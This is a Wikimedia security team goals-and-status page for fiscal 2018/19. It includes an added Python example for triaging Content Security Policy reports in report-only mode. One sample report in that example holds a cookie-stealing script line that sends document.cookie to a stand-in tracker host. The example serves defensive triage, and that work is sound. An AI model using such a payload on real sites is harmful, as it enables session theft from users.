Wikimedia Technology/Annual Plans/FY2019/CDP1: Privacy, Security, and Data Management/CDP Budget Segment 2/Goals

=Program Goals and Status for FY18/19=

Segment 2 - Security
 * Goal Owner: John Bennett
 * Program Goals for FY18/19: Develop, maintain and mature our privacy, security, and data management practices in order to protect Wikimedia community member and donor information, comply with applicable privacy and data protection regulations, and ensure safe and secure connection to Wikimedia projects and sites in accordance with the values of the movement.
 * Annual Plan: Segment 2 - Security
 * Primary Goal is Knowledge Equity: grow new contributors and content



= Q1 Goals =

Outcome 1 / Output 1
Ensure the high-quality protection and security of our infrastructure and data.
 * Review and update current security policies, standards and procedures

Goal(s)

 * Review and mature our security policies and awareness functions:
 * Create or update 3 security policies
 * Provide Security Awareness training
 * Perform Phishing campaign

Status
July 2018


 * ✅ 1 of the 3 policies has been created
 * ✅ Define Awareness content

August 2018


 * Define additional policies to update/create
 * Draft version of "Protecting your Digital Identity" created for Awareness Campaign
 * Onboard vendor to support phishing platform

September 12, 2018


 * Update/create the identified password use policies and incident response policies
 * Provide awareness training (will be presented in October)
 * Perform phishing campaign; this will be completed in Q2

Outcome 1 / Output 2
Ensure the high-quality protection and security of our infrastructure and data.
 * Reduce risk, improve application security practices, improve code quality, reduce vulnerabilities and attack surface and encourage a secure by design approach.

Goal(s)

 * Testing campaigns:
 * Implement CSP in alert only mode
 * Penetration testing for English Wikipedia site
 * Security Release
 * Analytics Risk Assessment and Threat Model
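The "alert only" CSP goal listed here (tracked as "Expansion of CSP" in later quarters) works by sending the policy in the Content-Security-Policy-Report-Only header: the browser reports every violation to a collector endpoint but blocks nothing, so a policy mistake cannot break the site while the team learns what the real traffic looks like. The Python below is an added example, not code from the Wikimedia Security team or from MediaWiki. It builds that header from a constructed policy and triages constructed sample violation reports into the buckets a report-only rollout has to separate: first-party resources the policy forgot, browser-extension noise, inline script or eval, and unexpected third-party sources. The hosts, the /csp-report path and the report bodies are assumptions made for the example.

```python
"""Triage for a Content Security Policy deployed in alert-only (report-only) mode.

Added example, not code from the Wikimedia Security team or MediaWiki.
The policy, hosts, collector path and sample reports are constructed.
"""
import json
from collections import Counter
from urllib.parse import urlsplit

# Constructed policy (assumption: a real one lists the project's actual hosts).
REPORT_ONLY_POLICY = {
    "default-src": ["'self'"],
    "script-src": ["'self'", "https://static.example.org"],
    "img-src": ["'self'", "data:"],
    "report-uri": ["/csp-report"],  # hypothetical collector endpoint
}

# Hosts the site itself serves from. A violation naming one of these means the
# policy is too strict (upload.example.org is deliberately missing from img-src).
FIRST_PARTY_HOSTS = {"en.example.org", "static.example.org", "upload.example.org"}

# Browser extensions inject scripts into pages; their reports are noise, not a finding.
EXTENSION_SCHEMES = ("chrome-extension", "moz-extension", "safari-extension", "ms-browser-extension")


def build_report_only_header(policy: dict) -> tuple[str, str]:
    """Serialize the policy under the report-only header name: violations are
    reported to report-uri but nothing is blocked, so a mistake cannot break the site."""
    value = "; ".join(f"{directive} {' '.join(sources)}" for directive, sources in policy.items())
    return "Content-Security-Policy-Report-Only", value


def parse_csp_report(body: str) -> dict:
    """Parse one report-uri POST body; the legacy format wraps it in {"csp-report": {...}}."""
    doc = json.loads(body)
    return doc.get("csp-report", doc)


def classify_violation(report: dict, first_party_hosts=FIRST_PARTY_HOSTS) -> str:
    """Bucket one violation so the team knows whether to loosen the policy or investigate."""
    blocked = report.get("blocked-uri", "")
    if blocked in ("", "self", "inline", "eval"):
        # Inline script or eval: legacy inline code to move to nonces/hashes,
        # or an injection attempt; look at document-uri and script-sample.
        return "inline-or-eval"
    parts = urlsplit(blocked)
    if blocked in EXTENSION_SCHEMES or parts.scheme in EXTENSION_SCHEMES:
        return "browser-extension-noise"
    if parts.hostname in first_party_hosts:
        return "first-party-gap"  # the site's own resource: add it to the policy
    return "unexpected-third-party"  # unapproved resource or possible injection


def triage(bodies) -> Counter:
    """Count violation classes across a batch of raw report bodies."""
    return Counter(classify_violation(parse_csp_report(b)) for b in bodies)


# Constructed sample reports, one per bucket.
SAMPLE_REPORTS = [
    json.dumps({"csp-report": {"document-uri": "https://en.example.org/wiki/Main_Page",
                               "violated-directive": "img-src",
                               "blocked-uri": "https://upload.example.org/thumb/a.png"}}),
    json.dumps({"csp-report": {"document-uri": "https://en.example.org/wiki/Main_Page",
                               "violated-directive": "script-src",
                               "blocked-uri": "chrome-extension://abcdefgh/content.js"}}),
    json.dumps({"csp-report": {"document-uri": "https://en.example.org/wiki/Talk:Main_Page",
                               "violated-directive": "script-src",
                               "blocked-uri": "inline",
                               "script-sample": "document.location='https://tracker.example/?c='+document.cookie"}}),
    json.dumps({"csp-report": {"document-uri": "https://en.example.org/wiki/Main_Page",
                               "violated-directive": "script-src",
                               "blocked-uri": "https://tracker.example/t.js"}}),
]

if __name__ == "__main__":
    print(*build_report_only_header(REPORT_ONLY_POLICY), sep=": ")
    for bucket, n in triage(SAMPLE_REPORTS).most_common():
        print(f"{n:3d}  {bucket}")
```

The point of the buckets is that a report-only rollout produces far more reports than findings: first-party gaps and extension noise are expected and are fixed by editing the policy or ignored, while the inline and third-party buckets are the ones worth a security engineer's time before the header is ever switched to enforcing mode.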

Status
July 2018


 * ✅ Initial test rollout of CSP on test wiki
 * ✅ Define scope and onboard vendor for pen testing
 * Identify elements for security release
 * ✅ Identify and scope Analytics assessment

August 2018


 * Expand CSP rollout
 * Select pen testing dates
 * Prepare security release
 * identify and scope Analytics assessment

September 12, 2018


 * Expand CSP rollout
 * Complete pen testing (will start at end of September)
 * Prepare security release (currently stalled based on hiring)
 * Complete Analytics assessment

Outcome 1 / Output 3
Ensure the high-quality protection and security of our infrastructure and data.
 * Increase maturity and capabilities in the event of a security incident.

Goal(s)

 * Perform 2 Incident Response table top exercises

Status
July 2018
 * ✅ Perform Incident response exercise

August 2018


 * ✅ Perform 2nd Incident response exercise

September 12, 2018

 * Update Incident Response Plan

= Q2 Goals =

Due to major security incidents in October and November, all Security resources were dedicated to working on those incidents, which negatively affected the team's ongoing scheduled work.

Outcome 1 / Output 1
Ensure the high-quality protection and security of our infrastructure and data.


 * Review and update current security policies, standards and procedures

Goal(s)

 * Review and mature our security policies and awareness functions:
 * Create or update 3 security policies
 * Provide Security Awareness training
 * Perform Phishing campaign

Status
October 18, 2018
 * On track to publish policy changes by the end of Oct
 * Awareness content created and ready to deliver
 * Phishing campaign will be delayed until Nov.

December 12, 2018
 * This is now ✅ — one training session for FR-Tech happened in November, and the new policy was used during that training. Blog will go out by end of December.
 * Phishing campaign is ❌ and hope to be done in early 2019

Outcome 1 / Output 2
Ensure the high-quality protection and security of our infrastructure and data.


 * Reduce risk, improve application security practices, improve code quality, reduce vulnerabilities and attack surface and encourage a secure by design approach.

Goal(s)

 * Testing campaigns:
 * Implement CSP in alert only mode
 * Penetration testing for mobile apps
 * Security Release
 * OIT Risk Assessment and Threat Model
 * NIST CSF style assessment
 * Consider incorporation of Phan-taint-check into MW Core

Status
October 18, 2018


 * CSP changes in progress
 * 1st round of pen testing (on en wikipedia) will conclude by the end of Oct.
 * OIT assessment will be pushed into at least Nov
 * NIST CSF assessment on track to begin in Oct but will likely conclude in Nov.
 * Initial discussions have begun to include Phan in MW core, but this will not be completed in Oct.

December 12, 2018
 * CSP changes are now ✅
 * 1st round of pen testing (on en wikipedia) is ✅
 * OIT assessment is ❌, might be picked up in 2019.
 * NIST CSF assessment is ❌, should be picked up again in early 2019.
 * Initial discussion is to include Phan into MW core and should be completed by end of December.

Outcome 1 / Output 3
Ensure the high-quality protection and security of our infrastructure and data.


 * Increase maturity and capabilities in the event of a security incident.

Goal(s)

 * Finalize and test our Incident Response documentation

Status
October 18, 2018
 * Final tabletop with Legal will be held on Oct 30.

December 12, 2018
 * This is in progress: the documentation is being written and should get published on MediaWiki sometime in late December, so the goal will probably finish up in Q3 (early January). It has been thoroughly tested and will be published in January 2019.



= Q3 Goals =

Outcome 1 / Output 1
Ensure the high-quality protection and security of our infrastructure and data. Review and update current security policies, standards and procedures

Goal(s)
Review and mature our security policies and awareness functions:


 * Create or update 3 security policies
 * Provide Security Awareness training
 * Perform Phishing campaign
 * Security Code Review process improvements completed and published
 * Update/Consolidate security documentation

Status
January 9, 2019
 * Security policy updates are in progress ('acceptable use' is first up)
 * Training is in progress; working on revising content to be published later in January
 * Phishing campaign will start after the awareness training is done (most likely in Feb 2019)
 * Security code review improvements are in progress (in review now) and we hope to publish them by end of quarter
 * Updating and consolidating security documentation is also in progress

February 13, 2019
 * Security policy updates are still in progress alongside incident responses; we're hoping for 3 to be published this quarter.
 * Training is still in progress; recently published https://www.mediawiki.org/wiki/Protecting_your_digital_identity
 * Phishing campaign will start in the next couple of weeks, going dept by dept to train folks.
 * Security code review improvements are in progress, and the documentation is expected to be released this week.
 * Updating and consolidating security documentation is still in progress; we are inventorying all the docs we have now and consolidating (policy, SOP, standards, etc.).

March 14, 2019
 * Security code review improvements is ✅
 * Updating and consolidating security documentation is in progress but will finish up in Q4
 * Security policy updates are in progress right now, and will complete by EOQ
 * Phishing campaign has been ❌ for Q4
 * Security code review improvements are in progress but we hope to be done by EOQ

Outcome 1 / Output 2
Ensure the high-quality protection and security of our infrastructure and data. Reduce risk, improve application security practices, improve code quality, reduce vulnerabilities and attack surface and encourage a secure by design approach.

Goal(s)

 * Expansion of CSP
 * Security Release
 * Analytics Risk Assessment and Threat Model
 * Incorporation of Phan-taint-check into MW Core
 * Evaluate dynamic scanners
 * Routine penetration testing

Status
January 9, 2019


 * Expansion of CSP (a long running goal) is in progress, as is the security release.
 * Risk assessment is also in progress and should be done by end of Feb 2019
 * Incorporation of Phan-taint-check into MW Core is a bit slow to get going — adoption of getting it into Core is slow and might be delayed into Q4.
 * Dynamic scanner work will be completed in March or April 2019
 * Next round of penetration testing is using info from latest incidents

February 13, 2019
 * Expansion of CSP (a long running goal) is a bit ❌ but still expected to be done this quarter.
 * Security release is also ❌ and will most likely be pushed to Q4.
 * Risk assessment is also in progress and should be done by end of Feb 2019
 * Incorporation of Phan-taint-check into MW Core is also ❌
 * Dynamic scanner work will most likely be completed in Q4, or pushed into next FY. We'd like to do some manual scanning first, rather than building an automatic version.
 * Next round of penetration testing is still in progress, but we're not totally happy with the results from enwiki, so the vendor did the work again and produced a JavaScript threat model. We think we can call this ✅ for this quarter.

March 14, 2019
 * Expansion of CSP (a long running goal) is still ❌ for now - will be revised for Q4 work, and might take about a year to complete
 * Security release is also ❌, but looking to do a release in Q4
 * Risk assessment is in progress and will be completed by EOQ
 * Incorporation of Phan-taint-check into MW Core (another long running goal) will transition within the team this quarter; it might take another 6 months to be fully incorporated into MediaWiki core.
 * Dynamic scanner work has been ❌ to Q4
 * Penetration testing is ✅ for this FY

Outcome 1 / Output 3
Ensure the high-quality protection and security of our infrastructure and data.


 * Increase maturity and capabilities in the event of a security incident.

Goal(s)

 * Perform tooling and process retro
 * Finalize and test our Incident Response documentation
 * Create incident play by play dashboard
 * Perform 1 large scale tabletop exercise

Status
January 9, 2019


 * Tooling and process retro will take place in Feb 2019
 * Response documentation finalization will be most likely completed in March 2019
 * Play by play dashboard is in progress
 * Large scale tabletop exercise will happen in March

February 13, 2019
 * Tooling and process retro was held during our All Hands offsite, but we'll need to do a bit more. This will become a longer running goal in the future.
 * Response documentation finalization has started, and will have a working version by EOQ.
 * Play by play dashboard is ❌ for now, we hope to get back to it.
 * Large scale tabletop exercise will happen in sometime in March, but the work might be moved into Q4.

March 14, 2019
 * Tooling and process retro was ✅ earlier in the quarter and we are still building out the incident response documentation from the last incident; this process will run into Q4 (mostly for alerting)
 * Incident Response documentation playbooks are still in progress and will go into next FY
 * Incident play by play dashboard is now a stretch goal to be tackled in Q4
 * Large scale tabletop exercise has been ❌ to Q4



= Q4 Goals =

Outcome 1 / Output 1
Ensure the high-quality protection and security of our infrastructure and data. Review and update current security policies, standards and procedures

Goal(s)
Review and mature our security policies and awareness functions:


 * Create or update 3 security policies (ongoing goal)
 * Provide Security Awareness training (ongoing goal)
 * Perform Phishing campaign
 * Form Security Council
 * Form strategy and begin initial steps toward building a data governance platform
 * Form strategy and begin initial steps toward building a vulnerability management program
 * Assess current security logging capabilities (stretch goal)

Status
April 2019


 * Policy - updates and review of new Security Readiness Review SOP
 * Policy - SOP for creating new security policy has been drafted, and is in review
 * Policy - Acceptable Use Policy has been drafted, is in review, and is scheduled to go effective on 10 June 2019
 * Policy - Security Incident Response policy is being drafted, due by end of 4Q 2019
 * Security Awareness/Phishing - Once the Acceptable Use Policy is approved, awareness sessions will be held
 * Data governance platform review and construction in progress
 * Vuln mgmt
 * Logging - needs update

May 30, 2019


 * Policy - reconcile and polish the Data Classification and Data Protection policies
 * ✅ Membership for Security Council selected, planning on 1st meeting in June
 * Policy - updates and review of new Security Readiness Review SOP
 * Policy - SOP for creating new security policy has been drafted, and is in review
 * Policy - Acceptable Use Policy has been drafted, is in review, and scheduled to go effective in June 2019
 * Policy - ✅ Security Incident Response policy is being drafted, due by end of 4Q 2019
 * Vuln mgmt -- Initial scans performed, evaluating scanning solutions and results.
 * Logging - Updates to alerting capabilities.
 * ❌ Perform Phishing campaign. Maybe catch up on some pieces next month.
 * Policy - update Data Classification policy.

June 2019

Outcome 1 / Output 2
Ensure the high-quality protection and security of our infrastructure and data. Reduce risk, improve application security practices, improve code quality, reduce vulnerabilities and attack surface and encourage a secure by design approach.

Goal(s)

 * Expansion of CSP (ongoing goal)
 * Security Release (ongoing goal)
 * Analytics Risk Assessment and Threat Model
 * Incorporation of Phan-taint-check into MW Core (stretch goal)
 * Phan 2.x development and release (stretch goal)
 * Evaluate dynamic scanners
 * Routine penetration testing
 * Polish and demo appsec docker “toolboxes” (PHP, Python)
 * Improve security tooling for Phab/Gerrit monitoring
 * Formalized process and SOP for concept/design reviews.
 * Generate initial security metrics/measurements

Status
April 2019


 * Routine penetration testing - Scoping
 * Phan 2.x development and release - 2.x branch created, updates cherry-picked, older patches reviewed and cherry-picked
 * Evaluate dynamic scanners - new task created T219567, tool review, meeting w/ ZAP lead dev (Simon @ Mozilla)
 * See: T221477, hopefully some WIP patches soon
 * Formalized process and SOP for concept/design reviews - still reviewing, see also related Output 1 goal
 * ✅ Improve security tooling for Phab/Gerrit monitoring - calling this done for this quarter

May 30, 2019


 * Routine penetration testing - Scoping completed, awaiting scheduling
 * Phan 2.x development and release - 2.x branch created, updates cherry-picked, older patches reviewed and cherry-picked
 * Evaluate dynamic scanners - new task created T219567, tool review, meeting w/ ZAP lead dev (Simon @ Mozilla)
 * See: T221477, hopefully some WIP patches soon
 * Formalized process and SOP for concept/design reviews - still reviewing, see also related Output 1 goal
 * ❌ Metrics generation, maybe catch-up next month.
 * ✅ Improve security tooling for Phab/Gerrit monitoring - calling this done for this quarter
 * ✅ Analytics Risk Assessment and Threat Model
 * Security release on track and scheduled for next month.

June 2019

Outcome 1 / Output 3
Ensure the high-quality protection and security of our infrastructure and data.


 * Increase maturity and capabilities in the event of a security incident.

Goal(s)

 * Perform tooling and process retro
 * Finalize and test our Security Incident Response documentation
 * Create incident play by play dashboard
 * Perform 1 large scale tabletop exercise

Status
April 2019

May 30, 2019
 * ✅ Security incident scale proposals drafted, now in review
 * Security Incident Response policy and supporting incident response playbooks are being drafted
 * ❌ Create incident play by play dashboard and likely delayed until next quarter.

June 2019
 * Large scale tabletop exercise planned for late 4Q
 * Team Retro scheduled for June.